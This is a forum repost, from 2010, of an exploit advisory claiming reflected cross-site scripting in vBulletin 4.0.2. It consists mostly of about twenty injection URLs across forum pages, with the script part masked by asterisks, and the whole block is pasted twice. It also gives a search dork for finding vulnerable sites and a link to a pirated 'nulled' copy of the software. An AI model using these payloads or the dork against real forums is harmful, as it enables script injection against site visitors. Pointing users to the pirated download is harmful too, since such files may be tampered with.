S-HACKER
04-07-2010, 06:11 PM
==========================================
vBulletin Version 4.0.2 Xss Vulnerability
==========================================
================================================== ======================================
| # Title : vBulletin Version 4.0.2 Cross Site Scripting in URI Vulnerability
| # Author : indoushka
| # Web Site : http://www.digzip.com/files/54QE0JXS/vbulletin_4.0.2nulledfinal.rar
| # Dork : Powered by vBulletin? Version 4.0.2
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)
| # Bug : XSS
====================== Exploit By indoushka =================================
# Exploit :
http://127.0.0.1/upload/calendar.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/faq.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/forum.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/usercp.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/subscription.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/showthread.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/showgroups.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/sendmessage.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/search.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/register.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/profile.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/private.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/online.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/newthread.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/misc.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/memberlist.php?=>"'>********>*****(213771818860)***********
http://127.0.0.1/upload/member.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/inlinemod.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/index.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/forumdisplay.php?acuparam=>">********>*****(213771818860)***********
vBulletin Version 4.0.2 Xss Vulnerability
==========================================
================================================== ======================================
| # Title : vBulletin Version 4.0.2 Cross Site Scripting in URI Vulnerability
| # Author : indoushka
| # Web Site : http://www.digzip.com/files/54QE0JXS/vbulletin_4.0.2nulledfinal.rar
| # Dork : Powered by vBulletin? Version 4.0.2
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)
| # Bug : XSS
====================== Exploit By indoushka =================================
# Exploit :
http://127.0.0.1/upload/calendar.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/faq.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/forum.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/usercp.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/subscription.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/showthread.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/showgroups.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/sendmessage.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/search.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/register.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/profile.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/private.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/online.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/newthread.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/misc.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/memberlist.php?=>"'>********>*****(213771818860)***********
http://127.0.0.1/upload/member.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/inlinemod.php?acuparam=>">********>*****(213771818860)***********
http://127.0.0.1/upload/index.php/>">********>*****(213771818860)***********
http://127.0.0.1/upload/forumdisplay.php?acuparam=>">********>*****(213771818860)***********